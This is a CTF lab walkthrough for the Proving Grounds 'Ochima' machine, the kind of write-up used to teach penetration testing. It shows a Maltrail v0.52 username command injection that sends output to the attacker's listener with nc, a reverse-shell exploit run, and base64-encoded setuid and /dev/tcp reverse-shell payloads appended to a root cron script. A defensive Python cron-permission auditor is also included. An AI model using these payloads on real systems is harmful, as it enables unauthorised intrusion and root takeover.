Ochima Offsec Proving Grounds Practice Labor Day CTF Machine Walkthrough

0xRave
4 min read · Dec 19, 2023


Check the version of the web application to get an initial foothold. For root, either check for writable files or monitor processes; both work. Have fun.


Enumeration

sudo nmap -p- -Pn -v $ip -sS -A -T 4 -oN nmap.txt

Ports 22, 80 and 8338 are open.

Port 80

Just a default Apache page. Tried dirb and found nothing much. Move on to the next port.

Port 8338

Maltrail v0.52

The port runs Maltrail v0.52. Googling “maltrail 0.52 exploit”, we find an unauthenticated RCE for version 0.53.

Going through the exploit, the vulnerable parameter is the login username. Use Burp to intercept the traffic while clicking the login button to verify the login path and parameter.

Captured URL and parameter

Testing whether it is vulnerable to RCE

You can just run the exploit, or use Burp to verify manually.

# Test manually via Burp; run these on the Kali machine
echo "id|nc $KaliIP 80" | base64
nc -nvlp 80
# In Burp, replace the username value with the base64-encoded payload (URL-encoded)
username=;`echo+"aWR8bmasdTkyLjE2OC40NS4xNzYgODAK"+|+base64+-d+|+sh`
Vulnerability confirmed

Time to get our first flag =D

# Start the nc listener
nc -nlvp 80
# Execute the Maltrail exploit
python3 maltrail_exploit.py $KaliIP 80 http://$TargetIP:8338/login
Reverse shell gained

Get our first flag in the home directory.

Privilege Escalation

In the home directory, we discover a tar file owned by root. We can just cat the tar file; it is actually a backup of the /etc folder. We found an SSH private key by searching for “OPENSSH PRIVATE KEY”: cat etc_backup.tar, then hit Ctrl+Shift+F, which pops up a find bar at the bottom of your terminal, and search for “OPENSSH PRIVATE KEY”. It simply searches the text that appears in your terminal.

Search bar.

We copy the private key and try to SSH to the target machine; however, it requires a password.

Try linPEAS; it helps.

# Transfer linpeas.sh to the target machine
# On Kali
cd /path/to/linpeas.sh
python3 -m http.server 80
# On the target machine
curl http://$KaliIP/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

From the linPEAS results, we find a writable file owned by root.

Interesting file from linpeas
Checking the content

Checking the script: since we have write permission, we can append a malicious payload to the file and have it executed by root.

Testing whether the script runs as a cron job

# Append this line to the file, then check whether /tmp/1.txt was created by root
echo "echo 1 > /tmp/1.txt" >> /var/backups/etc_Backup.sh
# Wait a few seconds, then check /tmp
ls -al /tmp
1.txt created

There is always an alternative

In case linPEAS does not work on the target machine, we can use another tool to monitor processes: pspy.

Download pspy64s, transfer it to the target machine and execute it.

# On Kali
cd /path/to/pspy64s
python3 -m http.server 80
# On the target machine
curl http://$KaliIP/pspy64s -o /tmp/pspy
chmod +x /tmp/pspy
timeout 2m /tmp/pspy

💡💡 In a CTF we sometimes don’t want to lose our shell, but running pspy means we have to hit Ctrl+C to stop the process, which results in losing the shell. Hence we use timeout 2m so the process terminates after 2 minutes. You can also set it in seconds, e.g. 180s.

Result from pspy

What if I can’t transfer files to the target machine?

No worries, just use find to look for writable files:

find / -maxdepth 5 -type f -writable 2>/dev/null
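The root cause of this privilege escalation is a script that root runs from cron but that a low-privileged user can write to. From the defender's side, the same condition can be audited directly. The following is an added example, not part of the original walkthrough: it parses /etc/crontab-style entries (a constructed sample; only the etc_Backup.sh path comes from this machine) and flags any root-executed script whose owner or mode bits would let a non-root user modify or replace it.

```python
import os
import stat
import tempfile

# Constructed /etc/crontab-style sample (time fields, user, command); only the backup path is from the walkthrough.
SAMPLE_CRONTAB = """\
*/5 * * * * root /var/backups/etc_Backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

def script_paths(crontab_text: str, user: str = "root") -> list[str]:
    """Return absolute script paths that `user` runs from a system crontab."""
    paths = []
    for line in crontab_text.splitlines():
        fields = line.split()
        if len(fields) >= 7 and fields[5] == user and fields[6].startswith("/"):
            paths.append(fields[6])
    return paths

def insecure_reasons(path: str, expected_uid: int = 0) -> list[str]:
    """Why a root-executed script is unsafe (empty list = fine): wrong owner,
    group/world write bits, or a world-writable parent dir without sticky bit."""
    st = os.stat(path)
    reasons = []
    if st.st_uid != expected_uid:
        reasons.append(f"owned by uid {st.st_uid}, expected {expected_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons

def demo() -> dict[str, list[str]]:
    """Create a 0755 (safe) and a 0777 (weak) script in a temp dir, audit both."""
    with tempfile.TemporaryDirectory() as d:
        scripts = {"safe.sh": 0o755, "etc_Backup.sh": 0o777}
        for name, mode in scripts.items():
            path = os.path.join(d, name)
            with open(path, "w") as f:
                f.write("#!/bin/bash\ntar -cf /tmp/etc_backup.tar /etc\n")
            os.chmod(path, mode)
        # Temp files belong to the current user, so audit against that uid.
        return {n: insecure_reasons(os.path.join(d, n), os.getuid()) for n in scripts}

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "OK" if not reasons else "; ".join(reasons))
```

On a real host you would feed script_paths() the contents of /etc/crontab and /etc/cron.d/* and run insecure_reasons() with the default expected uid of 0; any non-empty result is the same finding linPEAS and find surfaced above.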

Getting a root shell

# On the target machine
echo -n "chmod u+s /bin/bash" | base64
echo "echo -n 'Y2htb2QgdStzIC9iaW4vYmFzaA=='|base64 -d|bash" >> /var/backups/etc_Backup.sh
# Wait a few seconds
ls -al /bin/bash
/bin/bash -p
# You can use other payloads as well, such as a reverse shell
echo -n "sh -i >& /dev/tcp/$KaliIP/80 0>&1" | base64
echo "echo -n 'c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNzYvODAgMD4mMQ=='|base64 -d|bash" >> /var/backups/etc_Backup.sh
Check whether the /bin/bash permissions were updated
Root shell gained.
Root shell via the sh payload.

Congrats!! Hope you learned something from this walkthrough. Check out my stories for other Proving Grounds machine walkthroughs. Leave a comment if you found another way to pwn this machine.
